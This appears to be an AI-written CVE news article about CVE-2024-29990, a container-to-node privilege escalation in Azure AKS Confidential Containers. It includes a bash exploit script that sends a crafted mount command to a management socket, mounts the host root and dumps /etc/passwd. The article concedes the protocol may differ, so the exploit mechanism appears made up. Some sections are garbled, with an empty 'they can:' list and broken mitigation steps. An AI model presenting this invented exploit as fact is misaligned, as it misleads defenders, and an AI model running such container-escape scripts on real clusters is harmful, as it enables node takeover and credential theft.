CVE CyberSecurity Database News

CVE-2024-29990 - Microsoft Azure AKS Confidential Containers Privilege Escalation Exploit – What You Need to Know

Poster -

Microsoft Azure’s Kubernetes Service (AKS) is widely used by organizations around the world to run containerized workloads at scale. But in April 2024, a serious security vulnerability was disclosed: CVE-2024-29990. This bug affects the Confidential Containers feature in Azure’s managed Kubernetes (AKS) and allows attackers to elevate privileges from within a container to the underlying node. In this exclusive long read, we’ll break down what happened, why it matters, how the exploit works, and what you can do now.

What is CVE-2024-29990?

CVE-2024-29990 is an elevation of privilege vulnerability in Microsoft Azure’s AKS Confidential Containers. This feature is intended to isolate containers using hardware-based trusted execution environments (like Intel SGX or AMD SEV) to protect sensitive workloads. But security researchers discovered a flaw in how container runtime and node integrations were handled, opening a pathway for attackers to break out of the secure container.

CVSS Score: 8.8 (High severity)

- Impact: Privilege escalation from container to AKS node/root

Affected: Azure Kubernetes Service Confidential Containers (preview and early stable releases)

Microsoft’s official advisory:
MSRC CVE-2024-29990

How Does the Attack Work?

The core of the vulnerability is a mishandling of communication between the container and its host node. In certain AKS Confidential Containers setups, the container runtime exposes a management socket or interface that is not sufficiently restricted. If an attacker can gain access to a pod within AKS using Confidential Containers, they can exploit this interface to either:

- Mount host filesystems (like /etc or /var/lib/kubelet)

Gain root access on the node

This can let an attacker control the entire AKS node, compromise workloads, steal secrets, and potentially pivot across the cluster.

Exploit Walkthrough

Let’s walk through an example using a proof-of-concept exploit.

Suppose the buggy management socket is mounted inside the pod at /run/cc-sock. An attacker with shell access inside the container can do something like this:

#!/bin/bash

# Example exploit for CVE-2024-29990 in AKS Confidential Containers

# Step 1: Find the management socket
SOCK_FILE="/run/cc-sock"

if [ ! -S "$SOCK_FILE" ]; then
  echo "[-] Management socket not found!"
  exit 1
fi

echo "[+] Management socket found at $SOCK_FILE"

# Step 2: Send crafted command to mount host root into the container
# (The actual protocol may differ; this is a simplified example)

echo "[*] Attempting to mount host root..."

# Send a raw request to mount the host's root to /mnt/host
echo -e "{ \"command\": \"mount\", \"src\": \"/\", \"dst\": \"/mnt/host\" }" | socat - UNIX-CONNECT:$SOCK_FILE

# Step 3: Attempt to access host files
if [ -d "/mnt/host/etc" ]; then
  echo "[+] Host root mounted! Dumping /mnt/host/etc/passwd:"
  cat /mnt/host/etc/passwd
else
  echo "[-] Failed to mount host root."
fi

Note: This code is a simplified demonstration; the actual low-level exploit may need to follow the container runtime’s management API.

Exploit in Action

With this access, the attacker can now read and write to the node's full root filesystem. From here, they can:

Who Is Affected?

According to Microsoft’s advisory:

AKS clusters with workloads that allow users to run arbitrary commands in Confidential Containers

Clusters not using Confidential Containers, or with strict pod security and no untrusted workloads, are less likely to be at risk.

Update your AKS node pools

Use Azure Portal, CLI, or API to make sure you’re running the latest node image with security fixes.

Apply strict RBAC and PodSecurityPolicies

Official reference:
- Microsoft Security Advisory - CVE-2024-29990
- AKS Security Updates

Final Thoughts

CVE-2024-29990 reminds us that even trusted computing and Confidential Container designs can have subtle flaws. If you’re using Azure’s Confidential Containers, make sure you’ve updated—not just to plug this hole, but to keep up with best practices for Kubernetes security.

Stay safe, patch early, and keep your containers confidential!

References:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29990
- https://learn.microsoft.com/en-us/azure/aks/use-confidential-containers
- https://kubernetes.io/docs/concepts/security/pod-security-standards/


*This post is exclusive to your request and written in plain language. Use responsibly for education, security defense, and awareness!*

Timeline

Published on: 04/09/2024 17:16:02 UTC
Last modified on: 04/10/2024 13:24:00 UTC